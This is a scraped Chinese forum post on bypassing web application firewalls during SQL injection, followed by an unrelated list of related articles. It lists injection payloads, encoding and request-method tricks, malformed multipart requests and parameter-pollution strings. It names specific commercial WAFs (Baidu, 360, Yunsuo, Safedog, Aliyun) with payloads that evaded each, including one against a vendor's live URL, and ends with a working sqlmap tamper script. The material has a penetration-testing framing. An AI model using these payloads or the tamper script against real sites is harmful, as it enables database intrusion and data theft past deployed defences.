mysql注入fuzz字典_sql注入fuzz bypass waf

本帖最后由 xmidf 于 2018-7-11 10:16 编辑

作者:whynot      转自:先知

0x0 前言

这里是简单对sql注入绕过waf的一个小总结,非安全研究员,这里不讲原理,关于原理搜集了一些其他大佬的文章(文章在最下面请自取),感谢他们的分享,比着葫芦画瓢,对着各大waf厂商跟着师傅们来一波实战,进行一个简单的总结。

0x1 注入点检测

一般的注入还是很好判断的,特别是基于报错,但有的时候略微有些奇葩的环境,再加上一些乱七八糟 waf,就比较难搞了,这里简单总结了一些方法。

利用数据库独有的一些函数

access  asc chr len #access-functions

mysql   substring   substr length

mssql   char ascii len substring    #mssql function str

oracle  ascii  chr length  substr upper lower replace(x,old,new)

这些数据库中一个通用的函数就是abs,如果觉得是int型注入不妨先试试2-abs(1),然后结合各类数据库的一些函数来判断是什么数据库的注入,当然对数据库了解越多越好。

改变请求方式

根据经验,一般情况下各脚本对http request method如下,这里以GET为例子,针对www.vul.com/?id=1来进行判断。

php GET

aspx GET

asp GET POST COOKIE

jsp GET POST

平常渗透测试中总是遇到各种各样的waf,有的时候一个单引号就死了,这个时候首选的一些方法就是转换请求头了,毕竟GET不如POST,POST不如multipart/form-data,当然不要看到php就不去转换,任何情况下都要尝试一下。

当然,可以用burp很方便的来进行change request method以及change body encoding。

之前碰到过一个有趣的例子,asp的站点可以通过cookie提交数据,而且可以使用len函数,可以初步判断为access或者mssql数据库,但是还是很头疼,最后一位大哥使用下面的函数可以判断成功。www.vul.com/2.asp?id=482

483-chr(chr(52)&chr(57))    #=482

chr(52) ‘4’

chr(57) ‘9’

chr(49) ‘1’ #chr(52)&chr(57)为49 chr(49)为1 虽然最后也没什么卵用但还是挺有意思的

数据库特性

mysql   注释符号# –+ ` ;%00 // 字符串可以使用成对的引号’admin’ = admin’’’

mssql   注释符号– // ;%00

oracle  注释符号– /**/ admin=adm’||’in

空白符号MySQL5 09 0A 0B 0C 0D A0 20

Oracle 00 0A 0D 0C 09 20

MSSQL 01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20

mysql和mssql可以使用|来进行相关的运算,而oracle会把||当成连接字符。

[AppleScript] 纯文本查看 复制代码1. iis+asp(x)

1.%u特性: iis支持对unicode的解析,如:payload为[s%u006c%u0006ect],解析出来后则是[select]

%u0061nd 1=1

另类%u特性: unicode在iis解析之后会被转换成multibyte,但是转换的过程中可能出现:多个widechar可能会转换为同一个字符。

如:select中的e对应的unicode为%u0065,但是%u00f0同样会被转换成为e s%u00f0lect

iis+asp

2.%特性: union selec%t user fr%om dd #iis+asp asp+iis环境下会忽略掉百分号,如:payload为[sele%ct], 解析出来后则是[select]

3.asp/asp.net在解析请求的时候,允许Content-Type: application/x-www-form-urlencoded的数据提交方式select%201%20from%20user

asp/asp.net request解析:

4.在asp和asp.net中获取用户的提交的参数一般使用request包,当使用request(‘id’)的形式获取包的时候,会出现GET,POST分不清的情况,譬如可以构造一个请求包,METHOD为GET,但是包中还带有POST的内容和POST的content-type, 换一种理解方式也就是将原本的post数据包的method改成GET,如果使用request(‘id’)方式获取数据,仍会获取到post的内容

2. php+apache畸形的boundary

1.php在解析multipart data的时候有自己的特性,对于boundary的识别,只取了逗号前面的内容,例如我们设置的boundary为—-aaaa,123456,php解析的时候只识别了—-aaaa,后面的内容均没有识别。然而其他的如WAF在做解析的时候,有可能获取的是整个字符串,此时可能就会出现BYPASS

Content-Type: multipart/form-data; boundary=------,xxxx

Content-Length: 191

------,xxxx

Content-Disposition: form-data; name="img"; filename="img.gif"

GIF89a

------

Content-Disposition: form-data; name="id"

1' union select null,null,flag,null from flag limit 1 offset 1-- -

--------

------,xxxx--

2.畸形method(header头中)

某些apache版本在做GET请求的时候,无论method为何值均会取出GET的内容。如请求的method名为DOTA,依然会返回GET方法的值,即,可以任意替换GET方法为其它值,但仍能有效工作,但如果waf严格按照GET方法取值,则取不到任何内容

3. web应用层

1.双重URL编码: 即web应用层在接受到经过服务器层解码后的参数后,又进行了一次URL解码

2.变换请求方式:

在web应用中使用了统一获取参数的方式: 如php里使用$_REQUEST获取参数,但WAF层如果过滤不全则容易bypass,如,waf层过滤了get/post,但没有过滤cookie,而web应用层并不关心参数是否来自cookie

urlencode和form-data: POST在提交数据的时候有两种方式,第一种方式是使用urlencode的方式提交,第二种方式是使用form-data的方式提交。当我们在测试的时候,如果发现POST提交的数据被过滤掉了,此时可以考虑使用form-data的方式去提交

4. hpp

asp.net + iis:id=1,2,3 #?str=a%27/*&str=*/and/*&str=*/@@version=0--

asp + iis :id=1,2,3

php + apache :id=3

jsp + tomcat :id=1

这里提供一种针对普通检测的方法,大家可自行发挥。mysql int型: %20%26%201=1  mysql.php?id=1%20%26%201=1

8f3ff2fbfdd7c7c8339951a6542705fa.gif

w1.png (1.24 MB, 下载次数: 74)

2018-7-11 17:53 上传另外在字符型中 ‘and’1’=’1是不需要加空格的,有时候也可以绕过一些waf判断

8f3ff2fbfdd7c7c8339951a6542705fa.gif

w2.png (1.03 MB, 下载次数: 86)

2018-7-11 17:54 上传

0x2 bypasswaf

由于mysql的灵活性,这里以mysql绕过为主,针对各大主流waf厂商进行一个测试,主要测试在线版的,本地就安装了一个360主机卫士。

其中http://192.168.44.132/mysql.php?id=1是我本地的一个测试环境

其中下面的绕过都是以fuzz为主,不考虑web容器的特性,尝试绕过联合查询 -1 union select 1,2,3 from dual

百度云加速bypass      union select    #filter

from dual   #not filted

select from dual    #filter

只需要绕过select即可 使用--+aaaaaa%0a可bypass

8f3ff2fbfdd7c7c8339951a6542705fa.gif

w3.png (647.51 KB, 下载次数: 84)

2018-7-11 17:55 上传

360主机卫士bypass      发现%23%0aand%230a1=1    可以绕过and 1=1 限制

最后在union select from的时候却绕不过去

直接使用大字符串来fuzz %23-FUZZ-%0a https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt 发现可以成功绕过waf

8f3ff2fbfdd7c7c8339951a6542705fa.gif

w4.png (192.78 KB, 下载次数: 86)

2018-7-11 17:57 上传

云锁       union select 如下就可以绕过

http://www.yunsuo.com.cn/download.html?id=1%20union/*!/*!select%201,2,3*/

转换成multiform/data可轻松绕过

8f3ff2fbfdd7c7c8339951a6542705fa.gif

w5.png (130.86 KB, 下载次数: 90)

2018-7-11 17:58 上传

安全狗bypass      直接搞就行了

8f3ff2fbfdd7c7c8339951a6542705fa.gif

w6.png (898.17 KB, 下载次数: 91)

2018-7-11 17:58 上传

当然也可以chunked提交

8f3ff2fbfdd7c7c8339951a6542705fa.gif

w7.png (2.02 MB, 下载次数: 99)

2018-7-11 17:59 上传

阿里云尝试使用自定义变量方式来绕过 @a:=(select @b:=table_namefrom{a information_schema.TABLES }limit 0,1)union select '1',@a

@p:=(select)被过滤 fuzz下p参数使用@$:=(select)可以绕过

union select 1被过滤   使用union%23aa%0a/!select--%01%0a/1,@$,3 可以绕过

发现重点就是绕过表名 select 1 from dual 一些常规的方法测试无果 随便fuzz下注释/!数字/却偶然发现有俩个数据包遗漏

想起了以前乌云上一哥的的一个漏洞https://wooyun.shuimugan.com/bug/view?bug_no=94367

8f3ff2fbfdd7c7c8339951a6542705fa.gif

w8.png (192.62 KB, 下载次数: 93)

2018-7-11 18:00 上传难道是因为访问频率导致遗漏?随即我又进行了一些fuzz fuzz1w到5w数字型的注释 加大线程 发现遗漏了更多

8f3ff2fbfdd7c7c8339951a6542705fa.gif

w9.png (201.65 KB, 下载次数: 79)

2018-7-11 18:00 上传我想测试一下之前的waf挑战赛,发现之前提交的payload已经修复了,而且那个漏洞url无法访问了

60f2b3a85eb3c8d57520d8fb9a0093fa.gif  所以无法确认。

随即我又进行了一些超长字符串的fuzz 简单fuzz1w-10w 以500为step 发现现象更多了 可初步判断存在遗漏

8f3ff2fbfdd7c7c8339951a6542705fa.gif

w10.png (216.08 KB, 下载次数: 108)

2018-7-11 18:01 上传

### 0x3 自动化

以360主机卫士为例,编写sqlmap tamper脚本。

正常无waf sqlmap联合查询如下:

8f3ff2fbfdd7c7c8339951a6542705fa.gif

w11.png (237.26 KB, 下载次数: 98)

2018-7-11 18:01 上传

开启主机卫士,放到浏览器调试,修改相关payload使其能正常运行。

最后tamper脚本如下:

[AppleScript] 纯文本查看 复制代码from lib.core.enums import PRIORITY

from lib.core.settings import UNICODE_ENCODING

__priority__ = PRIORITY.LOW

def dependencies():

pass

def tamper(payload, **kwargs):

"""

Replaces keywords

>>> tamper('UNION SELECT id FROM users')

'1 union%23!@%23$%%5e%26%2a()%60~%0a/*!12345select*/ NULL,/*!12345CONCAT*/(0x7170706271,IFNULL(/*!12345CASt(*/COUNT(*) AS CHAR),0x20),0x7171786b71),NULL/*!%23!@%23$%%5e%26%2a()%60~%0afrOm*/INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e AND table_schema=0x73716c696e6a656374--

"""

if payload:

payload=payload.replace("UNION ALL SELECT","union%23!@%23$%%5e%26%2a()%60~%0a/*!12345select*/")

payload=payload.replace("UNION SELECT","union%23!@%23$%%5e%26%2a()%60~%0a/*!12345select*/")

payload=payload.replace(" FROM ","/*!%23!@%23$%%5e%26%2a()%60~%0afrOm*/")

payload=payload.replace("CONCAT","/*!12345CONCAT*/")

payload=payload.replace("CAST(","/*!12345CAST(*/")

payload=payload.replace("CASE","/*!12345CASE*/")

payload=payload.replace("DATABASE()","database/**/()")

return payload

可以成功获取到相关数据。

8f3ff2fbfdd7c7c8339951a6542705fa.gif

w12.png (448.23 KB, 下载次数: 94)

2018-7-11 18:02 上传

其他参考链接如下:

[AppleScript] 纯文本查看 复制代码http://www.anquan.us/search?keywords=bypass&content_search_by=by_bugs

[url]http://drops.xmd5.com/static/drops/tips-7883.html[/url]

[url]https://xianzhi.aliyun.com/forum/attachment/big_size/wafbypass_sql.pdf[/url]

[url]http://drops.xmd5.com/static/drops/papers-4323.html[/url]

[url]https://www.cnblogs.com/xiaozi/p/6927348.html[/url]

[url]http://swende.se/blog/HTTPChunked.html#[/url]

[url]https://xz.aliyun.com/t/1239[/url]

[url]http://www.sqlinjectionwiki.com/categories/2/mysql-sql-injection-cheat-sheet/[/url]

[url]https://mp.weixin.qq.com/s/S318-e4-eskfRG38HZk_Qw[/url]

[url]https://joychou.org/web/nginx-Lua-waf-general-bypass-method.html[/url] #nginx lua waf

[url]https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF[/url]

[url]https://websec.ca/kb/sql_injection#MySQL_Comment_Out_Query[/url]

[url]https://forum.bugcrowd.com/t/sqlmap-tamper-scripts-sql-injection-and-waf-bypass/423[/url]

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/529713.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

python如何开发网站_如何用Python写一个小网站?

一、准备 python基础相关准备:pygame的基础知识,参考目光博客的“用Python和Pygame写游戏-从入门到精通”安python 3.8.0 在python官网下载,不多说。安装pygame,命令:pip install pygame如安装较慢,可以参考…

python项目选择背景_Python - - 项目实战 - - 游戏背景

目标背景交替滚动的思路确定显示游戏背景01,背景交替滚动的思路确定运行 备课代码,观察 背景图像的显示效果:游戏启动后,背景图像 会 连续不断地 向下方 移动在 视觉上 产生英雄的飞机不断向上方飞行的 错觉 - - 在很多跑酷游戏中…

【AI】人工智能复兴的推进器之自然语言处理

目录 一、什么是自然语言处理 二、词袋模型 三、向量 四、代码示例 五、大模型和自然语言处理 接上篇:【AI】人工智能复兴的推进器之机器学习-CSDN博客 一、什么是自然语言处理 自然语言处理(Natural Language Processing,NLP&#xf…

css阻止换行_CSS中,如何处理短内容和长内容?

本文已经过原作者 shadeed 授权翻译。当我们使用 CSS 构建布局时,考虑长短文本内容很重要,如果能清楚地知道当文本长度变化时需要怎么处理,可以避免很多不必要的问题。在许多情况下,添加或删除一个单词会改变 UI 的外观&#xff0…

duilib设置透明窗口_界面开发心得与Duilib | 学步园

一、设置窗体透明度和指定透明色(如指定了黑色,即所有黑色的部分将会变得透明)DWORD dwExStyleGetWindowLong(m_hWnd,GWL_EXSTYLE);if((dwExStyle&WS_EX_LAYERED)!WS_EX_LAYERED)SetWindowLong(m_hWnd,GWL_EXSTYLE,dwExStyle|WS_EX_LAYERED);HMODULE hInst Loa…

influxdb无法实现关联表_InfluxDb专业术语

InfluxDb专业术语重复是最好的学习方式,我们再重复一些Influx的概念吧,虽然很多已经讲过,甚至上一课已经讲了。我发现我自己还是有点啰嗦,不过这可能是一种好的学习方法哦。聚合函数aggregationaggregation是一个InfluxQL的函数&a…

mysql排序区分大小写吗_MySQL操作数据时区分大小写

一般情况下使用SQL语句执行update login_ticket set status1 where ticket‘ABC‘会将ticket’abc‘的数据也改掉,那么需要在列名ticket的后面加上collate utf8_binupdate login_ticket set status1 where ticket COLLATE utf8_bin‘ABC‘这里的collate后面的是指该…

java的四种访问权限_Java四种访问权限

一、访问权限简介访问权限控制: 指的是本类及本类内部的成员(成员变量、成员方法、内部类)对其他类的可见性,即这些内容是否允许其他类访问。Java 中一共有四种访问权限控制,其权限控制的大小情况是这样的:public > protected …

java分割汉字_Java分割中英文,并且中文不能分割一半?

最近准备入其他坑位。在面试过程中,遇到下面这题笔试题,拿出来分享分享。题目:编写一个截取字符串的函数,输入为一个字符串和字节数,输出为按字节截取的字符串。但是要保证汉字不被截半个,如“我ABC”4&…

full gc JAVA_java触发full gc的几种情况概述

前言近期被问及这个问题,在此记录整理一下。System.gc()方法的调用此方法的调用是建议JVM进行Full GC,虽然只是建议而非一定,但很多情况下它会触发 Full GC,从而增加Full GC的频率,也即增加了间歇性停顿的次数。强烈影响系建议能不使用此方法就别使用,让…

java excel条件格式_Java 设置Excel条件格式(高亮条件值、应用单元格值/公式/数据条等类型)...

概述在Excel中,应用条件格式功能可以在很大程度上改进表格的设计和可读性,用户可以指定单个或者多个单元格区域应用一种或者多种条件格式。本篇文章,将通过Java程序示例介绍条件格式的设置方法,设置条件格式时,因不同设…

java order()_java.util.Collections.reverseOrder()

描述reverseOrder()方法被用来获取强加实现可比接口的对象collection的自然顺序相反的比较器。声明以下是java.util.Collections.reverseOrder()方法的声明。public static Comparator reverseOrder()参数NA返回值方法调用返回一个比较器,该比较器对实现Comparable接…

jsp mysql登录 demo_java jsp+servlet+mysql实现登录网页设计

涉及以下几个文件:1。登录页面 login.jsp2,成功跳转页面 success.jsp3,失败跳转页面 fail.jsp4,servlet 处理类 LoginTestServlet.java5,配置文件 web.xml--------------------------------------------- 依次看代码 …

libsvm java下载_一个基于LIBSVM(JAVA)的股票预测demo

【实例简介】一个基于LIBSVM的股票价格预测程序,采用随机森林算法对样本进行训练和预测,使用的编程语言为JAVA。【实例截图】【核心代码】stock-master└── stock-master├── data│ ├── 000752.csv│ ├── 300251.csv│ ├── 300329.c…

mysql 家谱树查询_中国家谱族谱数据库可以登录、查询了

原标题:中国家谱族谱数据库可以登录、查询了中青在线武汉6月6日电(党波涛 中国青年报中青在线记者 雷宇)数据量全球第一,最早可追溯到明朝万历年间。华中师范大学中国农村研究院今天对外发布,由该院建设的中国家谱族谱数据库正式上线&#xf…

mysql-5.5.56配置_mysql 5.5.56免安装版配置方法

mysql 5.5.56免安装版配置方法发布时间:2020-10-18 23:16:23来源:脚本之家阅读:74作者:阿安安mysql 5.5.56免安装版配置方法,本文通过文字代码详解,具体内容如下所示:1. 下载mysql-5.5.56-winx6…

MySQL命令梳理_MySQL操作命令梳理(2)

一、表操作在mysql运维操作中会经常使用到alter这个修改表的命令,alter tables允许修改一个现有表的结构,比如增加或删除列、创造或消去索引、改变现有列的类型、或重新命名列或表本身,也能改变表的注释和表的类型。下面就针对alter修改命令的…

java 进度条_进度条Java

你必须使用线程.设计一个实现Runnable接口的类,它将更新这样的值.class ProgressBarUpdator implements java.lang.Runnable {/*** Progress bar that shows the current status*/private javax.swing.JProgressBar jpb null;/*** Progress bar value*/private java.lang.Inte…

java 文件存储_文件存储学生信息(JavaIO流)

package com;import java.io.File;import java.io.FileNotFoundException;import java.io.FileOutputStream;import java.io.IOException;import java.util.Scanner;/*** author Administrator*1.要求:有五个学生,每个学生有姓名、年龄 、成绩三个属性&a…

位运算java_Java中的位运算

Java中的位运算,说实话,工作了两年的时间里,从来没有用过一次,因为平时都是些的是业务代码,很少接触比较底层的东西,我记得第一次在代码中看到还是在HashMap的Hash算法中看到的,这次重拾Java基础…